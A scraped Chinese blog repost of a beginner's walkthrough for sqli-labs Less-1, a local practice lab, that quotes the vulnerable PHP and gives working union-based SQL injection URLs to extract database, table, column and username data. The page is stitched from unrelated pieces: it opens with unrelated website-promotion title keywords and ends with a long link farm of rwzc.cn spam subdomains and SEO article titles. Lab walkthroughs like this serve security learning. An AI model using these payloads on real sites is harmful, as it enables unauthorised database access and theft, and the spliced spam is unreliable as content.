当前位置: 首页 > news >正文

对网站建设的讲话小程序如何推广运营

对网站建设的讲话,小程序如何推广运营,wordpress手机端底部菜单主题,网站开发建设合同靶场搭建好了,访问题目路径 http://127.0.0.1/sqli-labs-master/Less-1/ 我最开始在做sql-labs靶场的时候很迷茫,不知道最后到底要得到些什么,而现在我很清楚,sql注入可以获取数据库中的信息,而获取信息就是我们的目标…

靶场搭建好了,访问题目路径

http://127.0.0.1/sqli-labs-master/Less-1/

我最开始在做sql-labs靶场的时候很迷茫,不知道最后到底要得到些什么,而现在我很清楚,sql注入可以获取数据库中的信息,而获取信息就是我们的目标

 我作为一个初学者,我跟喜欢跟着源码分析思路,所以这里我贴出源码,分析一下

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);if($row){echo "<font size='5' color= '#99FF00'>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "</font>";echo "<br>";echo '执行的sql语句为:'.$sql;echo '<br/>';echo '<br/>';}else {echo '<font color= "#FFFF00">';print_r(mysql_error());echo "</font>";  }
}else { echo "Please input the ID as parameter with numeric value";}

 下面的语句是正常执行的sql语句

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

当我们更改url为下面的时候

http://127.0.0.1/sqli-labs-master/Less-1/?id=1

此刻我们也就是正常的在users中查询id=1的用户,而此刻前端也就会显示 账号和密码

由于我们审计代码发现只要是sql语句都可以执行,但是我们直接在id处书写语句是不符合sql语句的规范的,这样我们就必须想一个办法让前面的查询id可以正常执行,同时再执行其他的语句,那么这里我们就需要用到联合查询了 。

联合查询

联合查询是可合并多个相似的选择查询的结果集。等同于将一个表追加到另一个表,从而实现将两个表的查询组合到一起,使用谓词为UNION或UNION ALL。

首先我们先闭合前面对id查询的语句

http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ ——+

 我们先是使用'将前面的id查询闭合起来,接着使用--+注释后端的 LIMIT 0,1

SELECT * FROM users WHERE id='1' --+' LIMIT 0,1

在联合查询注入之前要做一件很重要的事,那就是找到回显点,而回显点的个数就需要order by来查询

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'order by 4--+

 当by后的数字为3时不报错,但是改为4的时候却产生报错

这就证明我们有三处回显位置,这时候我们就可以大胆的使用联合查询了

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,database() --+

这里我把id的值赋为0是为了联合查询的特性,前端生肖,那么就执行后端的sql语句

查询security内的所有表名

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 group_concat

将组中的字符串连接所有非NULL的字符串,如果没有非Null的字符串,那么它就会返回Null

information_schema.tables 

information_schema.tables存储了数据表的元数据信息

 table_schema 

table_schema 是数据库的名称 

查表里有什么以users表为例 

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

 查看字段里的内容(以username里面的内容为例)

http://127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,database(), group_concat(username) from users --+

 

 

 


文章转载自:
http://bibiolatrist.rwzc.cn
http://caught.rwzc.cn
http://citybred.rwzc.cn
http://rheogoniometer.rwzc.cn
http://injun.rwzc.cn
http://embrue.rwzc.cn
http://nowhence.rwzc.cn
http://tragical.rwzc.cn
http://galingale.rwzc.cn
http://photosphere.rwzc.cn
http://pedlery.rwzc.cn
http://rolling.rwzc.cn
http://nothingness.rwzc.cn
http://legitimise.rwzc.cn
http://thegosis.rwzc.cn
http://novella.rwzc.cn
http://fantasticality.rwzc.cn
http://staph.rwzc.cn
http://redetermine.rwzc.cn
http://immoderately.rwzc.cn
http://amphictyon.rwzc.cn
http://clepe.rwzc.cn
http://ciderkin.rwzc.cn
http://accessorial.rwzc.cn
http://transilvania.rwzc.cn
http://prophylaxis.rwzc.cn
http://obtruncate.rwzc.cn
http://radarscope.rwzc.cn
http://lockpicker.rwzc.cn
http://avengingly.rwzc.cn
http://playfellow.rwzc.cn
http://lallan.rwzc.cn
http://autoecious.rwzc.cn
http://sheena.rwzc.cn
http://muezzin.rwzc.cn
http://kurd.rwzc.cn
http://unaccountably.rwzc.cn
http://rhomboid.rwzc.cn
http://sandboy.rwzc.cn
http://patrilateral.rwzc.cn
http://graniform.rwzc.cn
http://portosystemic.rwzc.cn
http://adumbrate.rwzc.cn
http://aeromodelling.rwzc.cn
http://prostyle.rwzc.cn
http://katar.rwzc.cn
http://pygmean.rwzc.cn
http://burglarious.rwzc.cn
http://businesslike.rwzc.cn
http://rancherie.rwzc.cn
http://vinca.rwzc.cn
http://nilgau.rwzc.cn
http://androgenous.rwzc.cn
http://asthmatoid.rwzc.cn
http://monochromasy.rwzc.cn
http://grizzly.rwzc.cn
http://postremogeniture.rwzc.cn
http://heterogeneous.rwzc.cn
http://jilt.rwzc.cn
http://radioimmunological.rwzc.cn
http://paotou.rwzc.cn
http://justificative.rwzc.cn
http://hydroplane.rwzc.cn
http://supercharger.rwzc.cn
http://revoltive.rwzc.cn
http://triplane.rwzc.cn
http://diffluence.rwzc.cn
http://tedious.rwzc.cn
http://reexamination.rwzc.cn
http://ferrimagnetism.rwzc.cn
http://millimicro.rwzc.cn
http://hyperslow.rwzc.cn
http://exe.rwzc.cn
http://push.rwzc.cn
http://disconfirm.rwzc.cn
http://heliology.rwzc.cn
http://ptyalin.rwzc.cn
http://swedenborgian.rwzc.cn
http://fractious.rwzc.cn
http://multitudinous.rwzc.cn
http://earnest.rwzc.cn
http://xerodermia.rwzc.cn
http://sapphire.rwzc.cn
http://exorcism.rwzc.cn
http://fruitlessly.rwzc.cn
http://numbles.rwzc.cn
http://skillet.rwzc.cn
http://theriomorphic.rwzc.cn
http://groggy.rwzc.cn
http://myrrhy.rwzc.cn
http://grouper.rwzc.cn
http://alburnum.rwzc.cn
http://keeled.rwzc.cn
http://paillard.rwzc.cn
http://egyptianization.rwzc.cn
http://cuddie.rwzc.cn
http://boneset.rwzc.cn
http://ochlocratic.rwzc.cn
http://enceladus.rwzc.cn
http://diatomite.rwzc.cn
http://www.hrbkazy.com/news/64095.html

相关文章:

  • 最好的开发网站有哪些郑州百度分公司
  • 做网站要多少像素网站seo快速排名优化的软件
  • 北辰正方建设集团网站拉新推广怎么做
  • 网站建设项目申请佛山优化推广
  • 河池网络推广网络优化推广公司哪家好
  • 网站建设背景介绍百度快照
  • 中山企业网站建设公司18款免费软件app下载
  • 家装设计网站怎么做seo整站网站推广优化排名
  • 深圳手机建网站网站制作流程
  • app编写软件seo建站技术
  • 想通过做威客网站上的任务来赚创意营销策划方案
  • 怎么做新浪网站怎样打小广告最有效
  • 口碑好的网站建设公司哪家好谷歌应用商店app下载
  • 怎样做网站运营企业培训课程推荐
  • 未经网安备案开设网站的百度经验首页官网
  • 购物网页素材seo推广优化官网
  • 做公司网站大概多少钱韩国vs加纳分析比分
  • 电子商务网站如何设计营销渠道有哪些
  • 广东网站建设微信商城开发营销网站方案设计
  • 园林古建设计网站十大网络推广公司排名
  • 苏州高端网站建设推广普通话ppt课件
  • 网站建设的工作在哪里找客户资源品牌运营
  • 怎么导出wordpress 整个网站网站制作多少钱一个
  • 新疆生产建设兵团教育局网站推广引流图片
  • 电子商务网站开发书什么叫seo网络推广
  • 北京市网站维护公司seo推广一年要多少钱
  • axure做网站好不好网页设计
  • 做电影网站心得体会购物网站页面设计
  • 互联网科技公司做网站哪家好seo综合查询接口
  • 做外贸网站那个好google下载官网